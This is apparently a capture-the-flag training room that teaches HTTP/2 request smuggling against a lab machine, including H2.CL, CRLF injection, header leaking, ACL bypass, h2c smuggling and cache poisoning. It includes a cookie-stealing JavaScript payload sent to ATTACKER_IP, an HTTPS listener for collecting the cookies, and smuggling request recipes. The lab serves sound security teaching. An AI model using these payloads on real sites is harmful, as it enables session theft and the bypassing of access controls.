Room Banner

HTTP/2 Request Smuggling

Exploit HTTP Request Smuggling in HTTP/2 environments.

hard

45 min

Room progress ( 0% )

To access material, start machines and answer questions login.

Task 1Introduction

In this room, we'll look at ways to smuggle requests through proxies that use HTTP/2. Even though HTTP/2 was designed to prevent request smuggling, we'll show how, under certain specific scenarios, requests can still be smuggled, even with more ease.

Learning Objectives

  • Understand the basics of HTTP/2.
  • Learn how to exploit HTTP request smuggling via HTTP/2.
  • Use tools to detect/exploit said vulnerabilities.

Room Prerequisites

Before attempting this room, you must complete the HTTP Request Smuggling room. You must also be comfortable using proxies like Burp or ZAP.

Starting the VM

You will need to deploy the VM attached to this task by pressing the green Start Machine button at the top of the task. The machine will deploy all the required scenarios to complete the room. Each task that requires you to complete a practical element will point you to the URL of the web application you will need. You may access the VM using the AttackBox or your VPN connection.

Answer the questions below
Deploy the VM before continuing.

HTTP/2

The second version of the HTTP protocol proposes several changes over the original HTTP specifications. The new protocol intends to overcome the problems inherent to HTTP/1.1 by changing the message format and how the client and server communicate. One of the significant differences is that HTTP/2 requests and responses use a completely binary protocol, unlike HTTP/1.1, which is humanly readable. This is a massive improvement over the older version since it allows any binary information to be sent in a way that is easier for machines to parse without making mistakes.

While the HTTP/2 binary format is difficult to read for humans, we will use a simplified representation of requests throughout the room. Here's a visual representation of HTTP/2 requests compared with an HTTP/1.1 request:

HTTP 2 Request Structure

The HTTP/2 request has the following components:

  • Pseudo-headers: HTTP/2 defines some headers that start with a colon :. Those headers are the minimum required for a valid HTTP/2 request. In our image above, we can see the :method, :path, :scheme and :authority pseudo-headers.
  • Headers: After the pseudo-headers, we have regular headers like user-agent and content-length. Note that HTTP/2 uses lowercase for header names.
  • Request Body: Like in HTTP/1.1, this contains any additional information sent with the request, like POST parameters, uploaded files and other data.

Another important change in the structure of a request that may not be obvious is that HTTP/2 establishes precise boundaries for each part of a request or response. Instead of depending on specific characters like \r\n to separate different headers or : to separate the header name from the header value like HTTP/1, HTTP/2 adds fields to track the size of each part of a request (or response). More on this later.

Request Smuggling and HTTP/2

One of the main reasons HTTP request smuggling is possible in HTTP/1 scenarios is the existence of several ways to define the size of a request body. This ambiguity in the protocol leads to different proxies having their own interpretation of where a request ends and the next one begins, ultimately ending in request smuggling scenarios.

The second version of the HTTP protocol was built to improve on many of the characteristics of the first version. The one we most notably care about in the context of HTTP request smuggling is the clear definition of sizes for each component of an HTTP request. To avoid the ambiguities in HTTP/1, HTTP/2 prefixes each request component with a field that contains its size. For example, each header is prefixed with its size, so parsers know precisely how much information to expect. To understand this better, let's take a look at a captured request in Wireshark, looking specifically at the request headers:

HTTP 2 Binary Format

In the image, we are looking at the :method pseudo-header. As we can see, both the header name and value are prefixed with their corresponding lengths. The header name has a length of 7, corresponding to :method and the header value has a length of 3, corresponding to the string GET.

The request's body also includes a length indicator, rendering headers like Content-Length and Transfer-Encoding: chunked meaningless in pure HTTP/2 environments.

Note: Even though Content-Length headers aren't directly used by HTTP/2, modern browsers will still include them for a specific scenario where HTTP downgrades may occur. This is very important for our specific scenario and we will discuss it in more detail in the following tasks.

With such clear boundaries for each part of a request, one would expect request smuggling to be impossible, and to a certain extent, it is in implementations that rely solely on HTTP/2. However, as with any new protocol version, not all devices can be upgraded to it directly. This results in implementations of load balancers or reverse proxies that support HTTP/2, serving content from server farms that still use HTTP/1.

Answer the questions below
Which version of the HTTP protocol uses \r\n to separate headers in a request?

Which version of the HTTP protocol uses a binary format and clearly defines boundaries for elements in requests/responses?

HTTP/2 Downgrading

When a reverse proxy serves content to the end user with HTTP/2 (frontend connection) but requests it from the backend servers by using HTTP/1.1 (backend connection), we talk about HTTP/2 downgrading. This type of implementation is still common nowadays, making it possible to reintroduce HTTP request smuggling in the context of HTTP/2, but only where downgrades to HTTP/1.1 occur.

HTTP 2 Downgrading

Instead of dealing directly with HTTP/2, we send HTTP/2 requests in the frontend connection to influence the corresponding HTTP/1.1 request generated in the backend connection so that it causes an HTTP desync condition. 

Ideally, the proxy should safely convert a single HTTP/2 request to a single HTTP/1.1 equivalent. This is only sometimes true in practice. Each proxy implementation may handle the conversion slightly differently, making introducing a malicious HTTP/1.1 request in the backend connection possible, leading to any of the typical cases of HTTP desync.

The Expected Behaviour

Before getting into request smuggling, let's understand how a request would be translated from HTTP/2 to HTTP/1.1. Take the following POST request as an example:

How HTTP 2 Downgrading Works

The process is straightforward. The headers and the body from the HTTP/2 request are directly passed into the HTTP/1.1 request. Notice that the HTTP/2 request includes a content-length header. Remember that HTTP/2 doesn't use such a header, but HTTP/1.1 requires one to delimit the request body correctly, so any decent browser will include content-length in HTTP/2 requests to preemptively deal with HTTP downgrades. In the case of the proxies we will be using, the Host header is added after all the other headers based on the content of the :authority pseudo-header. Other proxy implementations may have the host header appear before the rest of custom headers.

H2.CL

As mentioned before, the Content-Length header has no meaning for HTTP/2, since the length of the request body is specified unambiguously. But nothing stops us from adding a Content-Length header to an HTTP/2 request. If HTTP downgrades occur, the proxy will pass the added content-length header from HTTP/2 to the HTTP/1.1 connection, enabling a desync. To better understand this, consider what would happen with the following HTTP/2 request:

H2.CL Case

The proxy receives the HTTP/2 request on the frontend connection. When translating the request to HTTP/1.1, it simply passes the Content-Length header to the backend connection. When the backend web server reads the request, it acknowledges the injected Content-Length as valid. Since the injected Content-Length in our example is 0, the backend is tricked into believing this is a POST request without a body. Whatever comes after the headers (the original body of the HTTP/2 request) will be interpreted as the start of a new request. Since the word HELLO is not a complete HTTP/1.1 request, the backend server will wait until more data arrives to complete it.

The backend connection is now desynced. If another user sends a request, it will be concatenated to the HELLO value lingering in the backend connection. If, for example, another user makes a request right after, this is what would happen:

H2.CL Victim

Note how the request line of the following request gets merged with the lingering HELLO. This effectively alters the request of the victim user, which can be abused by the attacker in many ways we'll cover later.

H2.TE

We can also add a "Transfer-Encoding: chunked" header to the frontend HTTP/2 request, and the proxy might also pass it to the backend HTTP/1.1 connection untouched. If the backend web server prioritises this header to determine the request body size, we can desync the backend connection once again. Here's how our HTTP/2 request would look:

H2.TE Case

The effect would be the same as with the H2.CL case. The first request is now a chunked request. The first chunk is of size 0, so the backend believes that's where it ends. The rest of the HTTP/2 request body will poison the backend connection, affecting the next upcoming request.

CRLF injection

CRLF is the shorthand notation for a newline. CR stands for Carriage Return, equivalent to the character with ASCII code point 0xD, also represented as the \r character. LF stands for Line Feed, the ASCII character with code point 0xA, often represented as \n. CRLF is simply the sequence of both those characters \r\n, one after the other, and is used in HTTP/1.1 as a delimiter between headers, and also to separate the headers from the body (by using a double \r\n).

Since HTTP/2 packets can handle binary information, inserting any character in any request field is possible. This poses a problem when translating requests to HTTP/1.1, as some characters like \r\n represent delimiters between headers. If we can inject \r\n in an HTTP/2 header, it might get translated by the proxy into HTTP/1.1 directly, which will be interpreted as a header separator, thus allowing us to smuggle requests.

To understand this, look at what would happen if we send the following HTTP/2 request:

CRLF Injection

The resulting HTTP/1.1 request now has an additional header. Note that we aren't limited to injecting headers, but we can also smuggle entire requests in this way:

CRLF injection is not restricted to HTTP/2 headers only. Any place where you send a \r\n that potentially ends up in the HTTP/1.1 request could potentially achieve the same results. Note that each proxy will try to sanitise the requests differently, so your mileage may vary depending on your target.

Practical Example

In this example, we will exploit an H2.CL vulnerability in an old version of Varnish proxy. In this lab, the proxy uses a single backend connection to handle the incoming requests of all users so that we can use the H2.CL vulnerability to interfere with other users' requests.

The application can be accessed via https://MACHINE_IP:8000/ and simulates an extremely simple social network. In this case, you can see your own posts (a single one) and like and dislike them. We will use the H2.CL vulnerability to force other users to like our post (the lab simulates a victim user).

First, let's analyse how the application works. By simple inspection, we can find out two important things:

  1. The application stores a sessid cookie in your browser with your assigned username to track your identity.
  2. To like a post, a GET request is sent to /post/like/<post_id>, where post_id is the id of the post we want to like. We can safely guess that the application will identify which user likes the post from the sessid cookie.

To force other users to like our post, we can send the following POST request:

Forcing a like

Notice we are using the POST method for the HTTP/2 request, because we want to send a request with a body. Since we set the content-length to 0, the backend will think the POST request has no body, and whatever comes next will be interpreted as a separate request (smuggled).

We are smuggling an incomplete GET request to /post/like/12315198742342. This request corresponds to giving a like to our post. Since the request is unfinished, the backend server will wait for more data in the backend connection to complete it. If another user were to send a request to the website right after that (to any URL), their request would be appended to our incomplete request. As a result, the backend server would receive a request like the following:

Victim Unknowingly Liking a Post

Notice how the request of our victim becomes a request to like our post. The original URL requested by the victim is ignored since it became part of the X: header we injected in the smuggled request. As a result, the backend server will process a like to our post but with the victim's cookies.

To get this working on Burp Suite, we would need to capture an HTTP/2 request to the site and use the Repeater to modify it until it looks like this:

Using Burp to Run the Exploit

Note: Be sure NOT to leave any additional newlines after the X: f header. If such spaces exist, the request line of the next incoming request won't be concatenated in the same line as our bogus header, making it a separate request altogether.

Be sure to check in the upper right corner that your repeated request is indeed an HTTP/2 request. Since our attack requires setting the Content-Length header to 0, we will also need to uncheck the "Update Content-Length" setting of the Repeater. Otherwise, Repeater will calculate the correct Content-Length depending on the size of the request body.

Disabling Update Content-Length

Once you have sent your payload, allow up to 30 seconds for the victim user to send a request. You may need to attempt the attack a couple of times to catch the user request on time. Make sure not to send any requests during the 30 seconds after poisoning the backend connection, cause doing so would make you trigger the payload yourself.

If all went well, you should now have a like from the victim user.

Answer the questions below
Repeat the request shown in the practical example against the app and wait for a user to fall for our trap. What is the username of the victim user who liked our post?

Request Tunneling vs Desync

So far, the attack vectors we have looked at depend on the backend server to reuse a single HTTP connection to serve all users. In certain proxy implementations, each user will get its own backend connection to separate their request from others. Whenever this happens, an attacker won't be able to influence the requests of other users. At first sight, it would appear that we can't do much if confined to our own connection, but we can still smuggle requests through the frontend proxy and achieve some results. Since we can only smuggle requests to our connection, this scenario is often called request tunnelling.

Per-user backend connections

In the following three tasks, we will use an old version of HAProxy, vulnerable to CVE-2019-19330 as our frontend proxy. This version allows request smuggling by using the CRLF injection technique. The vulnerable backend application will be accessible through the proxy at https://MACHINE_IP:8100.

Answer the questions below
Click and continue learning!

Leaking Internal Headers

The simplest way to abuse request tunnelling is to get some information on how the backend requests look. In some scenarios, the frontend proxies may add headers to the requests before sending them to the backend. If we want to smuggle a specific request to the backend, we may need to add such headers for the request to go through.

To leak such headers, we can abuse any functionality in the backend application that reflects a parameter from the request into the response. In our case, the application reflects whatever data is sent to /hello through the q POST parameter. Here's how the request would look like:

Search Engine Request

Notice the existence of a content-length header despite being ignored by HTTP/2. Most browsers will add this header to all HTTP/2 requests so that the backend will still receive a valid Content-Length header if an HTTP downgrade occurs. In the backend, the request would be converted into HTTP/1.1. This particular proxy will insert the Host: header after the headers sent by the client (right after content-length). If needed, the proxy could also add any additional headers (represented as X-Internal in the image). The final backend request would look like this:

Search Engine HTTP 1.1 Request

We will take advantage of the vulnerability in HAProxy that allows us to inject CRLFs via headers to leak the backend headers successfully. We will add a custom Foo header and send our attack payload through it. This is how our request would look:

Abusing CRLF Injection to Leak Internal Headers

There's quite a bit to unpack here:

  • This will be a normal request for the frontend since HTTP/2 doesn't care about binary information in its headers.
  • The Content-Length: 0 header injected through the Foo header will make the backend think the first POST request has no body. Whatever comes after the headers will be interpreted as a second request.
  • Since the Host header and any other internal headers are inserted by the proxy after Foo, the first POST request will have no Host header unless we provide one. This is why we injected a Host header for the first request. This is required, as the HTTP/1.1 specification requires a Host header for each request.
  • The second POST request will trigger a search on the website. Notice how the internal headers are now part of the q parameter in the body of the request. This will cause the website to reflect the headers back to us.
  • The second POST request we have injected has a Content-Length: 300. This number is just an initial guess of how much space we will require for the Internal headers. You will need to play a bit with it until you get the right answer. If it's set too high, the connection will hang as the backend waits for that many bytes to be transferred. If you set it too low, you may only get a part of the internal headers.

Now let's try sending this using Burp. First, capture the request that is sent by the website when performing a search. You should be able to identify a POST request being sent to /hello. Right-click the request and send it to Repeater:

Sending request to repeater

Note: Be sure to send an HTTP/2 request to repeater. Under certain circumstances, your browser may send an HTTP/1.1 request the first time you request a resource. In that case, simply refresh the website, and it should send an HTTP/2 request the second time.

Once our request is in the Repeater tab, we'll do two modifications to it:

  1. Delete the body content.
  2. Set the Content-Length header to 0. We do this for the same reason as before. We want the first request to be a POST with no body. Remember we will need to disable the Update Content-Length setting on Repeater to avoid Burp overwriting our custom value.

Deleting request body

If Burp is giving you a hard time with the above steps, here's a simplified version of the same modified request that you can copy directly into Repeater instead to continue:

POST /hello HTTP/2
Host: MACHINE_IP:8100
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Let's add our custom Foo header with an initial content of bar. Notice that Burp allows us to edit the HTTP/2 request as if it were an HTTP/1 request. This is somewhat convenient as long as you don't need to insert binary characters in the request. Since we will be adding CRLFs to the request, editing the request as text won't be possible. Instead, we will use the Inspector pane at the right, since it allows for a much more precise editing of the request: 

Adding a custom header to the request

Let's click the arrow beside the foo header in the Inspector and edit it to our desired value. Note that to insert a CRLF in the header value, you will need to press SHIFT + ENTER. The final result should look like this:

Kettled request

Once you press the Apply changes button, the Request pane will go blank and show you a message indicating the request is "kettled". This means that there's no way to represent the request in pure text anymore because of the special characters it contains (CRLFs in our case). From now on, all modifications to the request shall be done through the Inspector only.

When the request is ready, you can press the Send button as usual to send it. Remember that our HTTP/2 request will be split into two backend requests, so the first time you send it, you will only obtain the response of the first request, which is empty. To get the value of the hidden internal headers, you will need to send the same request twice in quick succession. If all goes well, the website should reflect the internal headers to you on the second request:

Leaked headers shown as search result

Note: The lab is configured to drop the backend connections after 10 seconds of inactivity, so if you are getting weird responses from the server, chances are that you have poisoned the connection with an incorrect request. Just wait 10 seconds and try again.

Answer the questions below
What's the value of the leaked internal header?

Bypassing Frontend Restrictions

In some scenarios, you will find that the frontend proxy enforces restrictions on what resources can be accessed on the backend website. For example, imagine your website has an admin panel at /admin, but you don't want it accessible to everyone on the Internet. As a simple solution, you could enforce a restriction in the frontend proxy to disallow any attempt to access /admin without requiring any changes in the backend server itself.

Let's try to access https://MACHINE_IP:8100/admin, and we'll get a message telling us the request has been denied.

Admin resource forbidden 

A request tunnelling vulnerability would allow us to smuggle a request to the backend without the frontend proxy noticing, effectively bypassing frontend security controls. Consider the following HTTP/2 request:

Smuggling a request to admin

Note: We are using a POST request for this scenario. While this is not specifically required for this attack to work, there's a fundamental difference on how GET and POST requests are treated by a proxy. If a proxy implements caching, a GET request may be served from the proxy's cache, so nothing will be forwarded to the backend server and the attack may fail. A POST request, on the other hand, is normally not served from cache, so it is guaranteed that it will be forwarded to the backend.

When the frontend sees this HTTP/2 request, it will interpret it as being directed to /hello which is allowed in the proxy's ACL. In the backend, however, the HTTP/2 request gets split in two HTTP/1.1 requests, where the second one points to /admin. Notice the second request is purposefully unfinished, so we will need to send the request twice to trigger the response corresponding to /admin.

Another way to understand the attack, would be to say that we are using an allowed resource, in this case /hello, to smuggle a request to a forbidden resource, in this case /admin. From the point of view of the proxy, only a request for /hello was made, so no violations to the ACL were made. It is important to note that the resource we request via HTTP/2 must be allowed by the ACL for this attack to work. We are effectively smuggling an invalid request over a valid one. This same method can sometimes be used to smuggle request past Web Application Firewalls (WAF).

Launching the Attack With Burp

You can start by capturing a request to /hello and sending it to the Repeater. From there, you should be able to adjust the request to implement the attack described in this task. Remember to make sure you captured an HTTP/2 request, as your browser may send an HTTP/1.1 request the first time.

If burp is giving you a hard time capturing the right request, here's a text version of the base request you'll need to modify. You can copy it directly in a new repeater tab and work your way from there:

POST /hello HTTP/2
Host: MACHINE_IP:8100
User-Agent: Mozilla/5.0
Foo: bar

Remember that once you insert binary data into the Foo header, Burp will go into kettled mode, so any editions to the request will need to be done from the Inspector tab.

Answer the questions below

What is the value of the flag in /admin?

Web Cache Poisoning

Even if we can't influence other users' connections directly, we may be able to use request tunnelling to poison server-side caching mechanisms, affecting users indirectly. This kind of attack has a high severity as it impacts all users visiting the website for as long as the cached content lasts. Given the right conditions, the poisoned cached content can have anything the attacker wants, including javascript payloads. This can be used to issue malicious redirects or even steal user sessions.

Note: Extreme care needs to be taken when testing web cache poisonings in real-world production systems, as they may affect the availability of the website if not conducted properly.

Understanding the Scenario

For this task, we are still using HAProxy. The HAProxy instance is configured to cache content for 30 seconds, so we should be able to perform the attack. Also, if something gets cached wrongly while you are doing your tests, waiting for 30 seconds will clear up the cache so you can start from scratch once again.

Before diving into details, let's lay out the plan. To achieve cache poisoning, what we want is to make a request to the proxy for /page1 and somehow force the backend web server to respond with the contents of /page2. It this were to happen, the proxy will wrongly associate the URL of /page1 with the cached content of /page2.

The trick we are using would allow you to poison the cache, but only with the content of other pages on the same website. This means the attacker wouldn't be able to pick arbitrary content for the cache poisoning. Luckily for us, there's some ways to overcome this limitation:

  1. If the website has an upload functionality.
  2. If we find a part of the website that reflects content from a request parameter. We can abuse articles or any other equivalent content to the website (Think of a blog).
  3. Under certain circumstances, open redirects can also be abused, but we won't cover this case during the room.

In any of those cases, the attacker can add arbitrary content to the website, which can be cached by the proxy and associated with any URL (existing or not). In the case of our application, we have an upload functionality at our disposal (https://MACHINE_IP:8100/upload). We can use it to upload any payload we want cached later.

File Uploads

Executing the Plan

Our goal in this task will be to steal cookies from any user visiting https://MACHINE_IP:8100/. The lab already simulates a victim user, and the flag for this task is in that user's cookies.

One option we could use would be poisoning the cache for / directly. But we want to be a bit more silent about things. By quick inspection, we can notice that / executes the showText() javascript function when the page's body loads, which is defined in /static/text.js

Analysing the javascript loaded by the website

Let's try to poison the cached version of /static/text.js to include a javascript payload to steal the cookies from the user.

Since we need the javascript payload to be on the website before the cache poisoning, let's start by uploading the following payload in a file named myjs.js:

var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
       document.getElementById("demo").innerHTML = xhttp.responseText;
    }
};
xhttp.open("GET", "https://ATTACKER_IP:8002/?c="+document.cookie, true);
xhttp.send();

This is a simple payload that will forward the victim's cookies back to a web server controlled by the attacker. Be sure to replace ATTACKER_IP with the IP address of your AttackBox. The only special thing about this payload is that it forwards the cookie via https. We need to use https, since HTTP/2 runs over https by default. If a script in an https website tried to load a resource using plaintext http, most browsers would block the action for security reasons. This means your standard python http server won't actually be able to receive the cookies, but more on that later.

After uploading our payload, the website will let us know that the file has been saved to /static/uploads/myjs.js. We now need to poison the cache so that it serves our payload whenever /static/text.js is requested. To do so, we will use the following request:

HTTP request splitting to poison the cache

Here, we are reusing the CRLF injection vulnerability in HAProxy to perform a request splitting attack in the backend. The first backend request will get the contents of /static/text.js. The second request will be for /static/uploads/myjs.js. The proxy should expect a single response to its request, but is getting two instead. The proxy will take the first response and serve it to the user, and keep the second response queued in the backend connection.

Note that we included the Pragma: no-cache header in our request to force the proxy to bypass any cached content and send the request to the backend server. Doing so allows us to send several requests until our payload is correctly triggered without waiting for the cache to time out.

If we now send an additional request for /static/text.js, we will get the queued response with the contents of myjs.jsBeyond the fact that we are receiving the wrong content for our new request, the cache will wrongly associate the contents of the queued response with the new URL we are requesting. Any other user that requests /static/text.js afterwards, will receive the contents of myjs.js served from the poisoned cached instead. This will last until the cached content expires, which is just 30 seconds for our lab.

Poisoning the cache by desyncing the backend connection

If your attack worked, you should now be able to use curl to request /static/text.js, and should get the contents of our payload instead. The following command would allow you to check if the attack worked:

AttackBox
user@attackbox$ curl -kv https://MACHINE_IP:8100/static/text.js
        

Note: Don't use your actual browser (Firefox, Chrome, Safari, etc.) to check if the attack worked. Modern browsers also have local caching, which may alter what you get from a URL, as it may be taken directly from your local cache instead of being requested to the proxy/web server.

Receiving the Flag

At this point, if the victim user navigates to /, their cookies will be sent to our AttackBox on port 8002 via https. We need to set up a simple web server that implements https to be able to read the received cookies. There are many ways to set up such a server, we will use python to do so. Before running the https web server we will need to create an SSL certificate and key with the following command:

AttackBox
user@attackbox$ openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -sha256 -days 3650 -nodes -subj "/C=XX/ST=StateName/L=CityName/O=CompanyName/OU=CompanySectionName/CN=CommonNameOrHostname"
        

Next, we'll create a file named https.py with the code responsible of running the https web server. The code is straightforward and let's you specify the port to use, which is 8002 in our case. The code also points to the SSL certificate and we previously generated. The code expects both of those files to be in the same directory as the python script:

from http.server import HTTPServer, BaseHTTPRequestHandler 
import ssl
httpd = HTTPServer(('0.0.0.0', 8002), BaseHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(
    httpd.socket,
    keyfile="key.pem",
    certfile='cert.pem',
    server_side=True)
httpd.serve_forever()

Once our script is ready, we can run it with the following command. You won't get any output initially, but as soon as the victim navigates to your webserver, logs will start to appear:

AttackBox
user@attackbox$ python3 https.py
        

The victim should visit / every 20 seconds, so you should get the flag quickly. If for some reason you aren't receiving it, remember the proxy's cache is set to last for 30 seconds only, so you may need to poison the cache again.

Answer the questions below
What is the value of the cookie stolen using web cache poisoning?

HTTP Version Negotiation

Web servers can offer the client many HTTP protocol versions in a single port. This is useful since you can't guarantee that users will have an HTTP/2-compliant browser. In this way, the server can offer the client both HTTP/1.1 and HTTP/2, and the client can select the version they want to use. This process is known as negotiation and is handled entirely by your browser. 

The original HTTP/2 specification defined two ways to negotiate HTTP/2, depending on whether the communications were encrypted or not. The two methods used the following protocol identifiers:

  • h2: Protocol used when running HTTP/2 over a TLS-encrypted channel. It relies on the Application Layer Protocol Negotiation (ALPN) mechanism of TLS to offer HTTP/2.
  • h2c: HTTP/2 over cleartext channels. This would be used when encryption is not available. Since ALPN is a feature of TLS, you can't use it in cleartext channels. In this case, the client sends an initial HTTP/1.1 request with a couple of added headers to request an upgrade to HTTP/2. If the server acknowledges the additional headers, the connection is upgraded to HTTP/2.

The h2 protocol is the usual way to implement HTTP/2 since it is considered more secure. In fact, the h2c specification is now regarded as obsolete to the point where most modern browsers don't even support it. Many server implementations, however, still support h2c for compatibility reasons, enabling a different way to smuggle requests.

h2c Upgrades

When negotiating a cleartext HTTP/2 connection, the client will send a regular HTTP/1.1 request with the Upgrade: h2c header to let the server know it supports h2c. The request must also include an additional HTTP2-Settings header with some negotiation parameters that we won't discuss in detail. A compliant server will accept the upgrade with a 101 Switching Protocols response. From that point, the connection switches to HTTP/2.

h2c upgrade process

Tunneling Requests via h2c Smuggling

When an HTTP/1.1 connection upgrade is attempted via some reverse proxies, they will directly forward the upgrade headers to the backend server instead of handling it themselves. The backend server will perform the upgrade and manage communications in the new protocol afterwards. The proxy will tunnel any further communications between client and server but won't check their contents anymore, since it assumes the protocol changed to something other than HTTP.

Tunneling requests via h2c smuggling

Since connections in HTTP/2 are persistent by default, we should be able to send other HTTP/2 requests, which will now go directly to the backend server through the HTTP/2 tunnel. This technique is known as h2c smuggling.

Note that for h2c smuggling to work, the proxy must forward the h2c upgrade to the backend. Some proxies are aware of h2c and could try to handle the connection upgrade themselves. In those cases, we would end up with a frontend connection upgraded to HTTP/2 instead of a direct tunnel to the backend, which wouldn't be of much use.

When facing an h2c-aware proxy, there's still a chance to get h2c smuggling to work under a specific scenario. If the frontend proxy supports HTTP/1.1 over TLS, we can try performing the h2c upgrade over the TLS channel. This is an unusual request, since h2c is defined to work under cleartext channels only. The proxy may just forward the upgrade headers instead of handling the upgrade directly, as it wouldn't make sense to have h2c over an encrypted channel according to the specification.

Note that h2c smuggling only allows for request tunnelling. Poisoning other users' connections won't be possible. But as we have already shown, this could still be abused to bypass restrictions on the frontend or even attempt cache poisoning.

Bypassing Frontend Restrictions With h2csmuggler

For this scenario, you will be attacking the application exposed in https://MACHINE_IP:8200. The application is served through a HAProxy instance with default configurations. The application exposes two endpoints:

  1. The / endpoint contains a simple website and is allowed through the proxy.
  2. The /private endpoint is not allowed through the proxy. You can try accessing it at https://MACHINE_IP:8200/private and you should get a 403 Forbidden response.

Our objective will be to use h2c smuggling to get the contents of /private through the proxy. We will use the h2csmuggler tool provided by BishopFox to do so. The tool will perform the full attack for us since doing it manually would be somewhat complicated.

The following command would first attempt an h2c upgrade while requesting /. Since that resource is allowed by the proxy, the connection will upgrade successfully to HTTP/2. The HTTP/2 tunnel would then be used to request /private, bypassing the frontend restrictions:

AttackBox
user@attackbox$ python3 h2csmuggler.py -x https://MACHINE_IP:8200/ https://MACHINE_IP:8200/private
        

Note that you may need to run the command a couple of times if it fails.

Answer the questions below
What's the value of the flag on /private?

In this room, we've covered multiple ways an attacker can use HTTP/2 to smuggle requests through reverse proxies. These methods aren't really about HTTP/2 flaws, but more about how HTTP/2 is used in mixed environments where HTTP/1.1 is still needed. As with conventional HTTP request smuggling attacks, the impact will vary from bypassing proxy-enforced ACLs, stealing user information or even poisoning caches that serve all users.

We have shown some basic examples of what can be achieved from an attacker's standpoint, but there's much more to explore. For more information on the subjects covered in this room, be sure to read the original research in the following links:

Answer the questions below
Click and continue learning!

Created by

Room Type

Free Room. Anyone can deploy virtual machines in the room (without being subscribed)!

Users in Room

7,179

Created

528 days ago

Ready to learn Cyber Security? Create your free account today!

TryHackMe provides free online cyber security training to secure jobs & upskill through a fun, interactive learning environment.

Already have an account? Log in

We use cookies to ensure you get the best user experience. For more information contact us.

Read more